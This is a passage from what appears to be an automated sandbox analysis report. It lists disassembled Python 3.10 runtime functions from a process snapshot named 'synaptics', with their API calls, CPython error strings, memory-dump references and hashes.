                                                                                                                                                                                                      • _Py_FatalErrorFormat.PYTHON310(PyGILState_Release,thread state %p must be current when releasing,00000000,PyGILState_Release,auto-releasing thread-state, but no thread-state for this thread,?,?,6C4A26A6,?,?,?,?,?), ref: 6C58FEC7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • auto-releasing thread-state, but no thread-state for this thread, xrefs: 6C58FEAD
                                                                                                                                                                                                      • thread state %p must be current when releasing, xrefs: 6C58FEBD
                                                                                                                                                                                                      • PyGILState_Release, xrefs: 6C58FEB2, 6C58FEC2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Error$FatalLast$FormatFuncValue
                                                                                                                                                                                                      • String ID: PyGILState_Release$auto-releasing thread-state, but no thread-state for this thread$thread state %p must be current when releasing
                                                                                                                                                                                                      • API String ID: 1033205851-3435955624
                                                                                                                                                                                                      • Opcode ID: 314b93619f5a91762d9337b27360fd3220ac5fd2a8d0674b8e38702d8b6b49b7
                                                                                                                                                                                                      • Instruction ID: 0e6cf89002311f10662ec4aa128c3a5e1574fb9245e0277a8fd882feb21387f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 314b93619f5a91762d9337b27360fd3220ac5fd2a8d0674b8e38702d8b6b49b7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EE012316155A4FB4F1137B6CD8CDAF3DBCAAC75553190A1CF504B2E016B20BA128679
                                                                                                                                                                                                      Function 6C4F4800 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_CallNoArgs.PYTHON310(?,73A83940,00000000,00000000,00000000,?,6C4F4AFC,00000000,00000000,00000000,6C4F54D1), ref: 6C4F4851
                                                                                                                                                                                                      • PyUnicode_AsUTF8AndSize.PYTHON310(?,?,73A83940,00000000,00000000,00000000,?,6C4F4AFC,00000000,00000000,00000000,6C4F54D1), ref: 6C4F487E
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C4F48C3
                                                                                                                                                                                                      • Py_UniversalNewlineFgets.PYTHON310(?,?,?,00000000,73A83940,00000000,00000000,00000000,?,6C4F4AFC,00000000,00000000,00000000,6C4F54D1), ref: 6C4F4927
                                                                                                                                                                                                      • strchr.VCRUNTIME140(?,00000000), ref: 6C4F4950
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(Non-UTF-8 code starting with '\x%.2x' in file %U on line %i, but no encoding declared; see https://python.org/dev/peps/pep-0263/ for details,?,?,?), ref: 6C4F4A6A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Non-UTF-8 code starting with '\x%.2x' in file %U on line %i, but no encoding declared; see https://python.org/dev/peps/pep-0263/ for details, xrefs: 6C4F4A5F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ArgsCallErr_FgetsFormatNewlineObject_SizeUnicode_Universalmemcpystrchr
                                                                                                                                                                                                      • String ID: Non-UTF-8 code starting with '\x%.2x' in file %U on line %i, but no encoding declared; see https://python.org/dev/peps/pep-0263/ for details
                                                                                                                                                                                                      • API String ID: 3010835910-4293708433
                                                                                                                                                                                                      • Opcode ID: f447f5a3796dbd2c358c27cd0275d0cc96febf2fc9ed21c912be54490a4e1227
                                                                                                                                                                                                      • Instruction ID: 5eae84990f3fe2aeae49372ca0d7a21beda300856571d1a273ad443e5e0e74df
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f447f5a3796dbd2c358c27cd0275d0cc96febf2fc9ed21c912be54490a4e1227
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 767126307047448FE720CA79DA40FA6B3E5ABC13A9F10566DC8B987F50EF31A8478796
                                                                                                                                                                                                      Function 6C4DD9C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation), ref: 6C4DD9E7
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?), ref: 6C4DD9FF
                                                                                                                                                                                                      • PyBytes_FromStringAndSize.PYTHON310(?,?), ref: 6C4DDA48
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C4DD9DB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String$Bytes_FromObjectReadySizeUnicode_
                                                                                                                                                                                                      • String ID: bad argument type for built-in operation
                                                                                                                                                                                                      • API String ID: 721296454-2291703510
                                                                                                                                                                                                      • Opcode ID: 48deba2379680bcb4f767518bd768508c2040f341974cd546d6b6fb7a9084fa7
                                                                                                                                                                                                      • Instruction ID: 7489b8bd8bc5ff24ecb4a573cf4905064e953a411e8e0dd9ee19eb9ea0396991
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48deba2379680bcb4f767518bd768508c2040f341974cd546d6b6fb7a9084fa7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18611A71A056548FCB11DE6CC880DA9BFB0EB47219F1982DAEC599B742C235E906CBF1
                                                                                                                                                                                                      Function 6C4F28C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Fetch.PYTHON310(?,?,?), ref: 6C4F2936
                                                                                                                                                                                                      • PyTuple_New.PYTHON310(00000000), ref: 6C4F2980
                                                                                                                                                                                                      • _PyErr_ChainExceptions.PYTHON310(?,?,?), ref: 6C4F299A
                                                                                                                                                                                                      • _PyErr_Restore.PYTHON310(?,?,?,?), ref: 6C4F2A39
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\weakrefobject.c,000003CF), ref: 6C4F2A63
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4F2A57
                                                                                                                                                                                                      • D:\a\1\s\Objects\weakrefobject.c, xrefs: 6C4F2A52
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ChainExceptionsFetchFormatRestoreTuple_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\weakrefobject.c
                                                                                                                                                                                                      • API String ID: 1687543838-1407204148
                                                                                                                                                                                                      • Opcode ID: 7a3a64cf13d0b7755457f9cba50b9968e909d3b31c1b7cbf9c3ec138b196eb88
                                                                                                                                                                                                      • Instruction ID: 1e781f2ea1f6999615e5527da0019bc4a9b1f6ce9bace2d94dc5517a10a2e635
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a3a64cf13d0b7755457f9cba50b9968e909d3b31c1b7cbf9c3ec138b196eb88
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA51DF72F012059FCB20CF99D844E9AB3B4EF8432AF15416DD829A7B51DB31E906CBD0
                                                                                                                                                                                                      Function 6C468B10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 140COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyTuple_New.PYTHON310(?), ref: 6C468B6B
                                                                                                                                                                                                      • _PyDict_Next.PYTHON310(?,00000000,?,?,00000000), ref: 6C468BD4
                                                                                                                                                                                                      • _PyDict_Next.PYTHON310(?,00000000,?,?,00000000), ref: 6C468C1D
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,keywords must be strings), ref: 6C468C41
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(?,?,?,?), ref: 6C468C72
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_Err_Next$MemoryStringTuple_
                                                                                                                                                                                                      • String ID: @xJlr$keywords must be strings
                                                                                                                                                                                                      • API String ID: 1626810041-3450806436
                                                                                                                                                                                                      • Opcode ID: 7d1e7f05474beb54a61c94dc6030acc4906042d6db8ae70a8aa7e0109efb25a3
                                                                                                                                                                                                      • Instruction ID: 40a49085763149098d9676d942f91a56f4e60d95bd04e18cc1f7a3034b7d7875
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d1e7f05474beb54a61c94dc6030acc4906042d6db8ae70a8aa7e0109efb25a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B41C176A001089FCF00DF99DD80DAEBBB9FB85319F14417AEA08D7715E731AA158B90
                                                                                                                                                                                                      Function 6C455C30 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73C0F0,Existing exports of data: object cannot be re-sized), ref: 6C455C73
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • @xJl, xrefs: 6C455D68
                                                                                                                                                                                                      • Existing exports of data: object cannot be re-sized, xrefs: 6C455C6C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: @xJl$Existing exports of data: object cannot be re-sized
                                                                                                                                                                                                      • API String ID: 1622067708-2875015091
                                                                                                                                                                                                      • Opcode ID: 498b04b5ef3f77c8e4a2eb4f22c340a2a873835d86da433e932dc5069bc52d6e
                                                                                                                                                                                                      • Instruction ID: 5b56a3bfd3b3c0b615589ab1f51f70f7dc37826f69a40a224d99654b1dc4cdc3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 498b04b5ef3f77c8e4a2eb4f22c340a2a873835d86da433e932dc5069bc52d6e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC412632B00A059BD701DE7DEC41D65F3A8EF45265B50833AE829D3F40EB30E865CAD1
                                                                                                                                                                                                      Function 6C4F4E60 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 121COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(tok_backup,tokenizer beginning of buffer,00000000,00000000,00000000,?,6C4F5DF2,imaginary), ref: 6C4F4F88
                                                                                                                                                                                                        • Part of subcall function 6C58C540: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,000000FF,?,6C566224,_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet,?,6C3ECF57,?), ref: 6C58C550
                                                                                                                                                                                                        • Part of subcall function 6C58C540: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,6C566224,_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet,?,6C3ECF57,?), ref: 6C58C557
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(tok_backup,tok_backup: wrong character,tok_backup,tokenizer beginning of buffer,00000000,00000000,00000000,?,6C4F5DF2,imaginary), ref: 6C4F4F97
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFatalFunc$__acrt_iob_func_fileno
                                                                                                                                                                                                      • String ID: invalid %s literal$lse$tok_backup$tok_backup: wrong character$tokenizer beginning of buffer
                                                                                                                                                                                                      • API String ID: 1461173008-3745451856
                                                                                                                                                                                                      • Opcode ID: 27ad031eeb6c5f89cd062afa4c36ee53a9fb52247c1df4b40577d70483a405f9
                                                                                                                                                                                                      • Instruction ID: eea566f90d8d766bc8a7cf5325d2b2cfb3588e7fe169dbda1d858bba6981f97f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27ad031eeb6c5f89cd062afa4c36ee53a9fb52247c1df4b40577d70483a405f9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7310672B050201A9B11E59D6780F9DB69557C13FEB10AA26E57CDBF40DF10CD8B43E6
                                                                                                                                                                                                      Function 6C5B7F20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long,?,?,?,?,?,6C5B8066,?), ref: 6C5B7F62
                                                                                                                                                                                                      • PyUnicode_InternInPlace.PYTHON310(?), ref: 6C5B7F91
                                                                                                                                                                                                        • Part of subcall function 6C4EE8B0: _PyUnicode_Ready.PYTHON310(?,00000000,?,?,6C476DF8,00000000,00000000,?,00000000,?,?,?,?,00000001), ref: 6C4EE8ED
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?,?,?,?,?,?,6C5B8066,?), ref: 6C5B7F9D
                                                                                                                                                                                                      • PyObject_Hash.PYTHON310(00000000), ref: 6C5B7FE3
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,?), ref: 6C5B8025
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unicode_$String$Dict_Err_FromHashInternItemObject_PlaceReady
                                                                                                                                                                                                      • String ID: @Btl$input too long
                                                                                                                                                                                                      • API String ID: 3420651487-3566857136
                                                                                                                                                                                                      • Opcode ID: d475c2d87bfe583f8c2cccde65356b3c53419586e71912bfcd29f128a8abaa41
                                                                                                                                                                                                      • Instruction ID: 95f3f70b540b7229d3d2c6e5493b5bad2b6204b83e3a7b6c8b715f425a4be8f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d475c2d87bfe583f8c2cccde65356b3c53419586e71912bfcd29f128a8abaa41
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91317071A0450157C6108969AC61EA677A49F853BDF24437AE838E7BD0EF31E905C2E3
                                                                                                                                                                                                      Function 73A8DA82 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8DAC6
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8DAD2
                                                                                                                                                                                                        • Part of subcall function 73A881A7: shared_ptr.LIBCMT ref: 73A881C3
                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 73A8DB92
                                                                                                                                                                                                        • Part of subcall function 73A8C2F2: DName::operator+.LIBCMT ref: 73A8C35D
                                                                                                                                                                                                        • Part of subcall function 73A8C2F2: DName::operator+.LIBCMT ref: 73A8C61B
                                                                                                                                                                                                        • Part of subcall function 73A880D2: DName::operator+.LIBCMT ref: 73A880F3
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8DB4D
                                                                                                                                                                                                        • Part of subcall function 73A881FF: DName::operator=.LIBVCRUNTIME ref: 73A88220
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8DBB6
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8DBC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
